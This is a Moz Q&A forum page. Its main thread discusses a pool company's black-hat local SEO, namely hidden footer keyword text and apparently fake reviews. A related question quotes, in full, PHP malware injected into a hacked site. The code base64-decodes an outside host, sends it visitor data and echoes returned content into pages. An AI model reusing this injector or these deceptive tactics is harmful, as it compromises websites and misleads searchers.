How does someone rank page one on google for one domain for over 150 keywords?
-
A local seo is exclaiming his fantastic track record for a pool company(amonst others) in our local market. Over 150 keywords on page one of google. I checked out a few things using some moz tools and didn't find anything that would suggest that this has come from white hat strategies, tactics or links etc. Interested in how he is doing this and if it is white hat? Thanks, C
-
There very well could be but I didn't look deep at all. I never even went past the first page of the site. I saw the footer and the phony review and quickly determined the SEO company was using poor techniques to manipulate results, and I would not want to expose a site to those methods.
-
Ryan,
Thanks for the analysis on local and the reviews. I suppose it is just an accumulation of several things, although I thought there might be something a bit more sophisticated at hand.
-
The results are greatly exaggerated. While it is true that each variation of a term can be viewed separated, there is nothing amazing about receiving the same results for these minor variations.
If your site ranks #1 for "Orlando Pool Repair" already, then earning the #1 ranking for "Orlando FL Poor Repair", "Orlando Pool Repairs", "Orlando FL Poor Repairs", "Orlando Pool Pump Repair", "Orlando Pool Pump Repairs", "Orlando Pool Pumps" and numerous other variations....it is all helpful and good, but hardly impressive.
Also note the site's organic listing is not even listed on the first page of Google SERP. It is their Google Local listing that ranks first (A) position. Notice the (D) position SERP result for orlandopool.com? The orlandopool.com site also is the 4th organic listing on the page.
What stands out to me about this site is they have 11 reviews. The other 6 local listings combined have 15 reviews. Notice their 4th review? Guess what. Brandtastic, the SEO company, gave them a Google review. I'm pretty sure if they were caught for this manipulation they would get thrown in the penalty box.
It looks like on April 14, 2010 the second Google review was offered as a negative review. It seems clear to me the site has, in one form or another, "acquired" multiple positive reviews which are not authentic. Notice there is another positive review on July 5th, the same day of the Brandtastic review. The April 18th, 2010 review seems highly suspect.
Despite 2 highly negative Google reviews, they do have 9 great reviews which provides the business a lot of credibility. They also have an A+ BBB rating which helps, along with a decently designed site with social integration, a blog, 40 years in business, etc.
The big clarity point is this site does well in Local SEO due to clear manipulations and some tactics which Keri point out that is definitely not a positive SEO approach. It would not surprise me at all if this site disappeared from SERPs at any point.
-
I didn't think that the greyed out text in the footer would actually make much difference in ranking...seems pretty old school black hat. Sure, agreed, rank doesn't mean conversion. It doesn't appear that there are bulk keyword domains with redirects.
-
Does anyone search those terms? Do those terms convert?
To answer your question, one of the ways one ranks is to have the light colored text on the light colored background on each page with the following in a spammy footer:
Orlando Pool Service - Orlando Pool Cleaning - Orlando Pool Repairs - Orlando Pool Remodeling - Orlando Pool Renovations - Winter Park, FL - Winter Park Pool Service - Winter Park Pool Service - Winter Park Pool Remodeling - Orlando, FL - Maitland, FL - College Park - Windermere, FL - Longwood, FL - Casselberry, Fl - Lake Mary, FL - Goldenrod, FL - Heathrow, FL - 32825 - 34786 - 32750 - 32779 32714 - 32810 - 32751 - 32707 - 32835 - 32828 - 32801 - 32803 - 32806 - 32789 - 32746 - 32712 - 33880 - 33881 - 33884 - 33801 - 33805 - 33803
-
Hi Ryan
The company is allpool.com and the keywords are here brandtastic.us/seo-allpoolrankings.htm Thanks, C
-
Well if the keywords were "fsafsdaf" and "iosdfosdjfsadlf" and teh like you may have a chance
-
Hi Charles.
We would love to offer feedback. What would help is the URL of the site along with some of the keywords which are involved. With that information we can offer a specific reply. Without it, we are left to a long list of generic guesses.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Submitting a page to Google Search Console or Bing Webmaster Tools with nofollow tags
Hello, I was hoping someone could help me understand if there is any point to submit a domain or subdomain to Google Search Console (Webmaster Tools) and Bing Webmaster Tools if the pages (on the subdomain for example) all have nofollow/noindex tags ... or the pages are being blocked by the robots.txt file). There are some pages on a data feed onto a subdomain which I manage that have these above characteristics ... which I cannot change ... but I am wondering if it is better to simply exclude from submitting those from GWT and BWT (above) thereby eliminating generating errors or warnings ... or is it better to tell Google and Bing about them anyway then perhaps there is a chance those nofollow pages may be indexed/contextualised in some way, making it worth the effort? Many thanks!
White Hat / Black Hat SEO | | uworlds
Mark0 -
How can I 100% safe get some of my keywords ranking on second & third page?
Hi, I want to know how can I rank some of my keywords which are in the second and third page on google on page one 100% save, so it will pass all penguin, pandas etc as quick as possible? Kind Regards
White Hat / Black Hat SEO | | rodica70 -
Secondary Domain Outranking Master Website
IEEE is a large professional association dedicated to serving engineers. The IEEE Web Presence is made up of flagship sites like IEEE.org, IEEEXplore, and IEEE Spectrum, mid-tier sites like Computer.org, and smaller sites like those dedicated to specific conferences. It is unclear exactly when this started - but searches in Google for [ieee] currently return ieeeusa.org before ieee.org. This is troublesome, as users are typically looking for IEEE.org with such a general query. ieeeusa.org is a site that has a much narrower focus - it is dedicated to public policy. IEEE.org is one of the strongest domains - I am thinking that this is a glitch of some sort. I am removing a stale sitemap that is referenced in robots.txt (though again, I'm not seeing any issues with other pages - its just two queries that are trouble: [ieee] and [about ieee]. And its noticeable in analytics 🙂 http://ieee.d.pr/hMg0/YhklCw7Z What do you think? 🙂
White Hat / Black Hat SEO | | thegrif3290 -
Buying a domain vs. renting a domain
I am considering buying and redirecting a domain that has a pretty strong, relevant link profile. However, it's very expensive. There is another option to rent the domain on a month-to-month basis. I am interested in doing this for at least a month just to see what SEO benefits are to be had and if it would ultimately be worth buying or not. Can renting a domain have any negative impacts on my primary site? Would the search engines know if I did this? Is there any harm in having those redirects appear and then disappear?
White Hat / Black Hat SEO | | jampaper0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
One good domain generating to much links what to do
I think penguin had no effect yet on spain. propdental.com remain the same.And propdental.es still growing.No penguin 2.0 effect. I think it will need a few more days to see if there is impact on spain.
White Hat / Black Hat SEO | | maestrosonrisas
Althought i have a question regarding coagnitive SEO, (is regarding a link to propdental.es from unidirectorio.com) i think is a good web, but as generated me an very big amount of links)i have this on link from unidirectorio.com that has generated 2400 links to www.propdental.es with this ancor text "clinica dental con dentistas especialistas en implantes dentales ortodoncia invisalign y carillas" Links is comes from this page http://undirectorio.com/Salud/dentistas/ and then generates 2400I can not remove this link. I seemed a good directory with just 3 pages linking out and good page rank on my specific field.I ask google to dont take that link into account, although i am not sure if i did it well.**Can someone tell me how to say to google to dont take in account the links from a domain?**google still shows this link on webmaster tools, i am afraid it ends up been bad. I seems a good directory is not an exact ancor text although containt all work i want to rank.What would be your advice? Do i have any way to make sure that google does not have the links recieved from that domain into account0 -
Domain Structure For A Network of Websites
To achieve this we need to set up a new architecture of domains and sub-websites to effectively build this network. We want to make sure we follow the right protocols for setting up the domain structures to achieve good SEO for the primary domain and local websites. Today we have our core website at www.doctorsvisioncenter.com which will ultimately will become dvceyecarenetwork.com. That website will serve as the core web presence that can be custom branded for hundreds. For example, today you can go to www.doctorsvisioncenter.com/pinehurst. Note when you start there, you can click around and it is still branded for Pinehurst or spectrum eye care. So the burning question(s). - if I am an independent doc at www.newyorkeye.com, I could do domain forwarding but Google does not index forwarded domains so that is out. I could do a 301 permanent redirect to my page www.doctorsvisioncenter.com/newyorkeye. I could then put a rule in the HT Access file that says if newyorkeye.com redirect to www.doctorsvisioncenter/newyorkeye and then have the domain show up as www.newyorkeye.com. Another way to do that is we point the newyorkeye DNS to doctorsvisioncenter.com rather than a 301 redirect with the same basic rule in the HT Access file. That means that, theoretically, every sub page would show up, for example, as www.newyorkeye.com/contact-lens-center which is actually www.doctorsvisioncenter.com/contact-lens-center. It also means, theoretically, that it will be seen as an individual domain but pointing to all the same content under that individual domain just like potentially hundreds of others. The goal is we build once, manage once and benefit many. If we do something like the above which will mean that each domain will essentially be a separate domain, but, will google see it that way or as duplicative content? While it is easy to answer "yes" it would be duplicative, it is not necessarily the case if the content is on separate domains. Is this a good way to proceed, or does anyone have another recommendation for us?
White Hat / Black Hat SEO | | JessTopps0 -
Google Sitemaps & punishment for bad URLS?
Hoping y'all have some input here. This is along story, but I'll boil it down: Site X bought the url of Site Y. 301 redirects were added to direct traffic (and help transfer linkjuice) from urls in Site X to relevant urls in Site Y, but 2 days before a "change of address" notice was submitted in Google Webmaster Tools, an auto-generating sitemap somehow applied urls from Site Y to the sitemap of Site X, so essentially the sitemap contained urls that were not the url of Site X. Is there any documentation out there that Google would punish Site X for having essentially unrelated urls in its sitemap by downgrading organic search rankings because it may view that mistake as black hat (or otherwise evil) tactics? I suspect this because the site continues to rank well organically in Yahoo & Bing, yet is nonexistent on Google suddenly. Thoughts?
White Hat / Black Hat SEO | | RUNNERagency0